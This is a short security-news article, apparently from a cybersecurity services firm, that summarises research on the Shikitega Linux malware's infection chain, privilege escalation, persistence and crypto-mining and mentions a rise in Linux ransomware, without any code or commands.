"New Stealthy Shikitega Malware Targeting Linux Systems" is a brand-new piece of stealthy Linux malware that uses a multi-stage infection chain to infiltrate endpoints and IoT devices and deposit further payloads. In a fresh research released on Tuesday, AT&T Alien Labs stated that an attacker "may take complete control of the system, in addition to the cryptocurrency miner that will be executed and set to persist."
Along with BPFDoor, Symbiote, Syslogk, OrBit, and Lightning Framework, other Linux malware that has recently been discovered in the wild includes Symbiote, Syslogk, and Lightning Framework.
The attack chain downloads and runs the Metasploit "Mettle" meterpreter once it has been installed on a target host in order to gain the most control. It then uses vulnerabilities to gain elevated privileges, adds persistence to the host using crontab, and finally starts a cryptocurrency miner on infected devices.
Although the precise means of the first intrusion are still unknown, Shikitega is evasive due to its capacity to download next-stage payloads from a command-and-control (C2) server and execute them instantly in memory.
The attacker can misuse the elevated permissions to fetch and execute the final stage shell scripts with root privileges in order to establish persistence and deploy the Monero crypto miner by exploiting CVE-2021-4034 (also known as PwnKit) and CVE-2021-3493.
To further evade detection, the malware's operators use a "Shikata ga nai" polymorphic encoder to make it harder for antivirus engines to find it and take advantage of reliable cloud services for C2 activities.
Shikitega is also a sign of a pattern in which bad actors are broadening the scope of their attacks to target the Linux operating system, which is widely used on servers and cloud platforms worldwide. This tendency has led to an increase in LockBit and Cheerscrypt ransomware infestations.
The advent of these new Linux ransomware families "directly corresponds to [...] a 75% rise in ransomware attacks targeting Linux systems in the first half of 2022 compared to the first half of 2021," claims Trend Micro's 2022 Midyear Cybersecurity Report.
Ofer Caspi, a researcher at AT&T Alien Labs, stated that threat actors "continue to explore for ways to spread malware in innovative ways to stay under the radar and avoid detection."
For more information Contact us or learn more about our Cyber security services